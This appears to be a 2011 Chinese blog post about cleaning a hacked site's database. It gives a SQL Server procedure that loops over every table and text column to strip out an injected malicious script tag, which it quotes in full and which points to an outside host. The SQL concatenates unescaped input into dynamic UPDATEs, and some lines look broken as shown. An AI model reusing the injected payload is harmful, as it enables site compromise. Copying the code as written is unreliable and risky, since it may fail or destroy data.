清风的blog 优然探索

SQL替换字符

好,被暴库了,加入了很多木马链接,无耐,用下面的方法替换。

--如果是第一次执行则先创建存储过程
--如果不是第一次执行则直接修改 就可以。或者直接调用

SQL代码
        
  1. create proc Full_Search(@string nvarchar(500),@string2 nvarchar(500))        
  2. --alter proc dbo.Full_Search(@string nvarchar(500),@string2 nvarchar(500))        
  3. as      
  4.  begin        
  5.       
  6.  declare @tbname varchar(500)        
  7.  declare tbroy cursor for select name from sysobjects        
  8.  where xtype= 'u ' --第一个游标遍历所有的表        
  9.         
  10.  open tbroy        
  11.  fetch next from tbroy into @tbname        
  12.  while @@fetch_status=0        
  13.   begin        
  14.          
  15.   declare @colname varchar(50)        
  16.   declare colroy cursor for select name from syscolumns        
  17.   where id=object_id(@tbname) and xtype in (        
  18.   select xtype from systypes        
  19.   where name in ( 'varchar ''nvarchar ''char ''nchar '--数据类型为字符型的字段        
  20.                 --where name in ('nvarchar ' ) --数据类型为字符型的字段        
  21.   ) --第二个游标是第一个游标的嵌套游标,遍历某个表的所有字段        
  22.          
  23.   open colroy       
  24.   fetch next from colroy into @colname       
  25.   while @@fetch_status=0       
  26.    begin      
  27.       
  28.    declare @sql nvarchar(1000),@j int      
  29.       
  30.    exec'UPDATE ' +@tbname + ' SET '+@colname+' = replace('+@colname+','''''+@string+ ''', '''''+@string2+ ''');')       
  31.                             
  32.    fetch next from colroy into @colname       
  33.    end      
  34.       
  35.   close colroy       
  36.   deallocate colroy       
  37.          
  38.   fetch next from tbroy into @tbname        
  39.   end        
  40.  close tbroy        
  41.  deallocate tbroy        
  42.       
  43.  end        
  44. go   

然后,执行下面语句:

SQL代码
        
  1. exec Full_Search '</title>"><script src=http://8881.ss.la/></script>',''      
  2. go  
2011年5月14日 | 发布:admin | 分类:技术笔记 | 评论:0

发表留言: